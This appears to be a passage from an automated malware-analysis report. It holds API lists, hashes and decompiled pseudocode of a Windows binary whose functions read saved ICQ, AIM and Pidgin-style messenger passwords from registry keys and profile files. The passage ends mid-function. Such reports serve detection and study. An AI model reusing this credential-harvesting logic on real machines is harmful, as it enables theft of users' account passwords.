                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi
                                          • String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
                                          • API String ID: 1439213657-1061492575
                                          • Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                          • Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
                                          • Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                          • Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E00408EAA(struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                          				void _v4103;
                                          				char _v4104;
                                          				intOrPtr _t29;
                                          				struct HMENU__* _t31;
                                          				intOrPtr* _t37;
                                          				struct HWND__* _t41;
                                          				struct HMENU__* _t46;
                                          
                                          				0x414060();
                                          				if(_a8 != 4) {
                                          					if(_a8 == 5) {
                                          						_t37 =  *0x41e390;
                                          						if(_t37 == 0) {
                                          							L8:
                                          							_push(_a12);
                                          							sprintf(0x41e308, "dialog_%d");
                                          							_t41 = CreateDialogParamA(_a4, _a12, 0, E00408EA5, 0);
                                          							_v4104 = 0;
                                          							memset( &_v4103, 0, 0x1000);
                                          							GetWindowTextA(_t41,  &_v4104, 0x1000);
                                          							if(_v4104 != 0) {
                                          								E00408CA1("caption",  &_v4104);
                                          							}
                                          							EnumChildWindows(_t41, E00408E37, 0);
                                          							DestroyWindow(_t41);
                                          						} else {
                                          							while(1) {
                                          								_t29 =  *_t37;
                                          								if(_t29 == 0) {
                                          									goto L8;
                                          								}
                                          								if(_t29 != _a12) {
                                          									_t37 = _t37 + 4;
                                          									continue;
                                          								}
                                          								goto L11;
                                          							}
                                          							goto L8;
                                          						}
                                          						L11:
                                          					}
                                          				} else {
                                          					_push(_a12);
                                          					sprintf(0x41e308, "menu_%d");
                                          					_t31 = LoadMenuA(_a4, _a12);
                                          					 *0x41e1fc =  *0x41e1fc & 0x00000000;
                                          					_t46 = _t31;
                                          					_push(1);
                                          					_push(_t46);
                                          					_push(_a12);
                                          					E00408D47();
                                          					DestroyMenu(_t46);
                                          				}
                                          				return 1;
                                          			}











                                          APIs
                                          • sprintf.MSVCRT ref: 00408ECB
                                          • LoadMenuA.USER32(?,?), ref: 00408ED9
                                            • Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
                                            • Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
                                            • Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
                                            • Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF
                                          • DestroyMenu.USER32(00000000), ref: 00408EF7
                                          • sprintf.MSVCRT ref: 00408F3B
                                          • CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
                                          • memset.MSVCRT ref: 00408F6C
                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
                                          • EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
                                          • DestroyWindow.USER32(00000000), ref: 00408FAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                          • String ID: caption$dialog_%d$menu_%d
                                          • API String ID: 3259144588-3822380221
                                          • Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                          • Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
                                          • Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                          • Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00409068(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8) {
                                          				void _v4103;
                                          				char _v4104;
                                          				int _t18;
                                          				void* _t20;
                                          				void* _t25;
                                          				int _t27;
                                          				void* _t29;
                                          
                                          				0x414060();
                                          				0x413d0c(0x41e200, _a8, _t25, _t29, _t20);
                                          				0x413d0c(0x41e308, "general");
                                          				E00408CA1("TranslatorName", 0x417c88);
                                          				E00408CA1("TranslatorURL", 0x417c88);
                                          				E00408CA1("Version", 0x417c88);
                                          				EnumResourceNamesA(_a4, 4, E00408EAA, 0);
                                          				EnumResourceNamesA(_a4, 5, E00408EAA, 0);
                                          				0x413d0c(0x41e308, "strings");
                                          				_t27 = 0;
                                          				_v4104 = 0;
                                          				memset( &_v4103, 0, 0x1000);
                                          				do {
                                          					_t18 = LoadStringA(_a4, _t27,  &_v4104, 0x1000);
                                          					if(_t18 > 0) {
                                          						_t18 = E00408D0F(_t27,  &_v4104);
                                          					}
                                          					_t27 = _t27 + 1;
                                          				} while (_t27 <= 0xffff);
                                          				 *0x41e200 = 0;
                                          				return _t18;
                                          			}











                                          APIs
                                          • _mbscpy.MSVCRT ref: 00409080
                                          • _mbscpy.MSVCRT ref: 00409090
                                            • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
                                            • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
                                            • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
                                          • _mbscpy.MSVCRT ref: 004090E3
                                          • memset.MSVCRT ref: 004090FF
                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
                                            • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                          • String ID: TranslatorName$TranslatorURL$Version$general$strings
                                          • API String ID: 1035899707-2179912348
                                          • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                          • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
                                          • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                          • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 667068680-3953557276
                                          • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                          • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
                                          • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                          • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                          • memset.MSVCRT ref: 004100EA
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
                                          • LocalFree.KERNEL32(?), ref: 004101C5
                                          • RegCloseKey.ADVAPI32(?), ref: 004101D0
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                          • RegCloseKey.ADVAPI32(?), ref: 004101F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                          • String ID: Creds$ps:password
                                          • API String ID: 551151806-1872227768
                                          • Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                          • Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
                                          • Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                          • Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 56%
                                          			E00405C4E(signed int _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				struct tagRECT _v68;
                                          				void _v323;
                                          				char _v324;
                                          				intOrPtr _v4612;
                                          				char _v8864;
                                          				struct HWND__* _v10984;
                                          				void* __ebx;
                                          				_Unknown_base(*)()* _t75;
                                          				void* _t78;
                                          				struct HINSTANCE__* _t91;
                                          				intOrPtr* _t99;
                                          				signed int _t101;
                                          				intOrPtr* _t106;
                                          				intOrPtr _t107;
                                          				void* _t109;
                                          				void* _t110;
                                          
                                          				0x414060();
                                          				_v12 = 8;
                                          				SetRect( &_v68, 1, 1, 1, 1);
                                          				if(MapDialogRect( *(_a4 + 4),  &_v68) != 0) {
                                          					_v12 = _v68.top << 2;
                                          				}
                                          				_v8 = _v8 & 0;
                                          				_v32 = 0x3ed;
                                          				_v28 = 0x3ef;
                                          				_v24 = 0x3ee;
                                          				_v20 = 0x3f0;
                                          				asm("stosd");
                                          				_v52 = 0xb02c;
                                          				_v48 = 0xb090;
                                          				_v44 = 0xb0f4;
                                          				_v40 = 0xb158;
                                          				asm("stosd");
                                          				_t99 =  &_v8864;
                                          				do {
                                          					E00402AA8(_a4,  *((intOrPtr*)(_t109 + _v8 - 0x1c)));
                                          					0x4134d0();
                                          					_v8 = _v8 + 4;
                                          					 *_t99 =  *((intOrPtr*)(_t109 + _v8 - 0x30));
                                          					_t99 = _t99 + 0x854;
                                          				} while (_v8 < 0x14);
                                          				_v8 = _v8 & 0x00000000;
                                          				do {
                                          					_a4 = _a4 & 0x00000000;
                                          					do {
                                          						_t101 = _a4 * 0x854;
                                          						_t106 = _t109 + _t101 - 0x2ae4;
                                          						0x4135a8();
                                          						if(_a4 == 0) {
                                          							_v324 = 0;
                                          							memset( &_v323, 0, 0xff);
                                          							_push(E0040876F(_v8 + 0x515));
                                          							sprintf( &_v324, "%s:");
                                          							_t110 = _t110 + 0x18;
                                          							SetWindowTextA(_v10984,  &_v324);
                                          						}
                                          						_t107 =  *_t106;
                                          						_t91 = LoadLibraryA("shlwapi.dll");
                                          						_t75 = GetProcAddress(_t91, "SHAutoComplete");
                                          						if(_t75 != 0) {
                                          							 *_t75(_t107, 0x10000001);
                                          						}
                                          						FreeLibrary(_t91);
                                          						 *((intOrPtr*)(_t109 + _t101 - 0x229c)) =  *((intOrPtr*)(_t109 + _t101 - 0x229c)) + 1;
                                          						_t78 = _v4612 + _v12;
                                          						 *((intOrPtr*)(_t109 + _t101 - 0x22a0)) =  *((intOrPtr*)(_t109 + _t101 - 0x22a0)) + _t78;
                                          						_a4 = _a4 + 1;
                                          					} while (_a4 < 5);
                                          					_v8 = _v8 + 1;
                                          				} while (_v8 < 7);
                                          				return _t78;
                                          			}
































                                          APIs
                                          • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
                                          • MapDialogRect.USER32(?,?), ref: 00405C7D
                                          • memset.MSVCRT ref: 00405D4B
                                          • sprintf.MSVCRT ref: 00405D6E
                                          • SetWindowTextA.USER32(?,?), ref: 00405D83
                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
                                          • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
                                          • String ID: %s:$SHAutoComplete$shlwapi.dll
                                          • API String ID: 2601263068-2802052640
                                          • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                          • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
                                          • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                          • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                          • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                          • strlen.MSVCRT ref: 00411C15
                                          • strlen.MSVCRT ref: 00411C22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressHandleModuleProcstrlen
                                          • String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
                                          • API String ID: 1027343248-251837621
                                          • Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                          • Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
                                          • Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                          • Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                          • API String ID: 714388716-318151290
                                          • Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                          • Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
                                          • Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                          • Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0040E293(void* __eflags, intOrPtr* _a4, int _a8) {
                                          				void* _v8;
                                          				char _v12;
                                          				void* _v16;
                                          				long _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v284;
                                          				char _v540;
                                          				void _v1553;
                                          				void _v1563;
                                          				char _v1564;
                                          				void _v2588;
                                          				char _v3611;
                                          				void _v3612;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* _t52;
                                          				int _t57;
                                          				void* _t64;
                                          				void* _t66;
                                          				void* _t67;
                                          				void* _t83;
                                          				intOrPtr* _t88;
                                          				intOrPtr _t105;
                                          				char _t107;
                                          				void* _t109;
                                          				int _t113;
                                          				long _t116;
                                          				void* _t117;
                                          				void* _t118;
                                          				intOrPtr* _t119;
                                          				void* _t120;
                                          
                                          				_t52 = E004067BA(_a8);
                                          				_pop(_t95);
                                          				_v8 = _t52;
                                          				if(_t52 != 0xffffffff) {
                                          					_t116 = GetFileSize(_t52, 0);
                                          					if(_t116 < 0x100000) {
                                          						_t3 = _t116 + 1; // 0x1
                                          						_t57 = _t3;
                                          						0x413d5c();
                                          						_t109 = _t57;
                                          						 *_t119 = 0x3ff;
                                          						_v16 = _t109;
                                          						_v12 = 0;
                                          						_v1564 = 0;
                                          						memset( &_v1563, 0, _t57);
                                          						_t120 = _t119 + 0xc;
                                          						 *_t109 = 0;
                                          						ReadFile(_v8, _t109, _t116,  &_v20, 0);
                                          						 *((char*)(_t109 + _t116)) = 0;
                                          						while(1) {
                                          							_t64 = E00407193(_t109, _t95,  &_v1564, 0x3ff,  &_v12);
                                          							_t120 = _t120 + 0xc;
                                          							if(_t64 == 0) {
                                          								break;
                                          							}
                                          							_t66 = E00407139(0, "user_pref("");
                                          							_pop(_t95);
                                          							if(_t66 == 0) {
                                          								_push(0x417ddc);
                                          								_t67 = 0xb;
                                          								_t13 = E00407139(_t67) - 0xb; // -11
                                          								_t95 = _t13;
                                          								_a8 = _t95;
                                          								if(_t95 > 0) {
                                          									_t117 = E00407139(E00407139(_t68 + 1, 0x417de4) + 1, 0x417ddc);
                                          									_pop(_t95);
                                          									if(_t117 > 0) {
                                          										_t17 = _t117 + 1; // 0x1
                                          										_t113 = E00407139(_t17, 0x417ddc) - _t117 - 1;
                                          										_pop(_t95);
                                          										if(_t113 > 0) {
                                          											memcpy( &_v2588,  &_v1553, _a8);
                                          											 *((char*)(_t118 + _a8 - 0xa18)) = 0;
                                          											memcpy( &_v3612, _t118 + _t117 - 0x617, _t113);
                                          											_t95 =  &_v2588;
                                          											 *((char*)(_t118 + _t113 - 0xe18)) = 0;
                                          											_t83 = E00407139(0, ".aim.session.password");
                                          											_t120 = _t120 + 0x1c;
                                          											if(_t83 > 0) {
                                          												 *((char*)(_t118 + _t83 - 0xa18)) = 0;
                                          												_v540 = 0;
                                          												_v284 = 0;
                                          												_v28 = 0;
                                          												_v24 = 0;
                                          												E00406958(0xff,  &_v540,  &_v2588);
                                          												E004029D9( &_v3611,  &_v284, 0xff);
                                          												_t107 = _v540;
                                          												_t105 = 2;
                                          												_v28 = _t105;
                                          												_t88 =  &_v540;
                                          												while(_t107 != 0) {
                                          													if(_t107 < 0x30 || _t107 > 0x39) {
                                          														_v24 = _t105;
                                          													} else {
                                          														_t88 = _t88 + 1;
                                          														_t107 =  *_t88;
                                          														continue;
                                          													}
                                          													L15:
                                          													_t95 = _a4;
                                          													 *((intOrPtr*)( *_a4))( &_v540);
                                          													goto L16;
                                          												}
                                          												_v24 = 3;
                                          												goto L15;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L16:
                                          							_t109 = _v16;
                                          						}
                                          						0x413d56(_t109);
                                          					}
                                          					CloseHandle(_v8);
                                          				}
                                          				return 1;
                                          			}




































                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
                                          • memset.MSVCRT ref: 0040E2F2
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
                                          • memcpy.MSVCRT ref: 0040E3AC
                                          • memcpy.MSVCRT ref: 0040E3CB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49D
                                          • CloseHandle.KERNEL32(?), ref: 0040E4A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
                                          • String ID: .aim.session.password$user_pref("
                                          • API String ID: 1009687194-2166142864
                                          • Opcode ID: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                          • Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
                                          • Opcode Fuzzy Hash: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                          • Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 35%
                                          			E0040D794(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
                                          				char _v12;
                                          				int _v16;
                                          				void* _v20;
                                          				long _v24;
                                          				int _v28;
                                          				char _v44;
                                          				void _v303;
                                          				char _v304;
                                          				intOrPtr _v308;
                                          				intOrPtr _v312;
                                          				char _v568;
                                          				char _v824;
                                          				void _v1079;
                                          				int _v1080;
                                          				void* __ebx;
                                          				void** _t45;
                                          				char* _t49;
                                          				long _t51;
                                          				long _t55;
                                          				long _t62;
                                          				long _t68;
                                          				int _t70;
                                          				int _t76;
                                          				void* _t78;
                                          				void* _t79;
                                          				void* _t80;
                                          				void* _t81;
                                          
                                          				_t45 =  &_a8;
                                          				_v24 = 1;
                                          				0x411d68(_a8, "Software\Mirabilis\ICQ\NewOwners", _t45);
                                          				_t79 = _t78 + 0xc;
                                          				if(_t45 == 0) {
                                          					_t70 = 0;
                                          					_v12 = 0;
                                          					_v304 = 0;
                                          					memset( &_v303, 0, 0xff);
                                          					_t80 = _t79 + 0xc;
                                          					_t49 =  &_v304;
                                          					_push(_t49);
                                          					_push(0);
                                          					while(1) {
                                          						0x411dee(_a8);
                                          						_t81 = _t80 + 0xc;
                                          						if(_t49 != 0) {
                                          							break;
                                          						}
                                          						_t51 =  &_v304;
                                          						0x411d68(_a8, _t51,  &_v20);
                                          						_t80 = _t81 + 0xc;
                                          						__eflags = _t51;
                                          						if(_t51 != 0) {
                                          							L10:
                                          							_t38 =  &_v12;
                                          							 *_t38 = _v12 + 1;
                                          							__eflags =  *_t38;
                                          							_t49 =  &_v304;
                                          							_push(_t49);
                                          							_push(_v12);
                                          							continue;
                                          						} else {
                                          							_v16 = 0x10;
                                          							_t55 = RegQueryValueExA(_v20, "MainLocation", _t70,  &_v28,  &_v44,  &_v16);
                                          							__eflags = _t55;
                                          							if(_t55 != 0) {
                                          								L9:
                                          								RegCloseKey(_v20);
                                          								goto L10;
                                          							} else {
                                          								_t76 = atoi( &_v304);
                                          								__eflags = _t76 - _t70;
                                          								if(_t76 <= _t70) {
                                          									goto L9;
                                          								} else {
                                          									__eflags = _v16 - 8;
                                          									if(__eflags < 0) {
                                          										goto L9;
                                          									} else {
                                          										_v1080 = _t70;
                                          										memset( &_v1079, _t70, 0xff);
                                          										_t80 = _t80 + 0xc;
                                          										_t62 = E0040807D( &_v1080, __eflags, _t76, _a12,  &_v44, _v16);
                                          										__eflags = _t62;
                                          										if(_t62 == 0) {
                                          											L8:
                                          											_t70 = 0;
                                          											__eflags = 0;
                                          											goto L9;
                                          										} else {
                                          											_v824 = 0;
                                          											_v568 = 0;
                                          											_v312 = 0;
                                          											_v308 = 0;
                                          											0x413d0c( &_v568,  &_v1080);
                                          											0x413d0c( &_v824,  &_v304);
                                          											_t80 = _t80 + 0x10;
                                          											_v308 = 3;
                                          											_v312 = 8;
                                          											_t68 =  *((intOrPtr*)( *_a4))( &_v824);
                                          											__eflags = _t68;
                                          											_v24 = _t68;
                                          											if(_t68 != 0) {
                                          												goto L8;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						break;
                                          					}
                                          					RegCloseKey(_a8);
                                          				}
                                          				return _v24;
                                          			}


                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                          • atoi.MSVCRT ref: 0040D840
                                          • memset.MSVCRT ref: 0040D869
                                          • _mbscpy.MSVCRT ref: 0040D8B3
                                          • _mbscpy.MSVCRT ref: 0040D8C6
                                          • RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                          • memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
                                          • String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
                                          • API String ID: 2897902629-2277304809
                                          • Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                          • Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
                                          • Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                          • Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • strchr.MSVCRT ref: 0041118A
                                          • _mbscpy.MSVCRT ref: 00411198
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                            • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                          • _mbscpy.MSVCRT ref: 004111E8
                                          • _mbscat.MSVCRT ref: 004111F3
                                          • memset.MSVCRT ref: 004111CF
                                            • Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                            • Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8
                                          • memset.MSVCRT ref: 00411217
                                          • memcpy.MSVCRT ref: 00411232
                                          • _mbscat.MSVCRT ref: 0041123D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                          • String ID: \systemroot
                                          • API String ID: 912701516-1821301763
                                          • Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                          • Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
                                          • Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                          • Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004068B5(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				long _v16;
                                          				void* _t14;
                                          				void* _t20;
                                          				void* _t28;
                                          				void* _t33;
                                          				long _t35;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				EmptyClipboard();
                                          				_t14 = E004067BA(_a4);
                                          				_v12 = _t14;
                                          				if(_t14 == 0xffffffff) {
                                          					_v8 = GetLastError();
                                          				} else {
                                          					_t35 = GetFileSize(_t14, 0);
                                          					_t5 = _t35 + 1; // 0x1
                                          					_t20 = GlobalAlloc(0x2000, _t5);
                                          					_t28 = _t20;
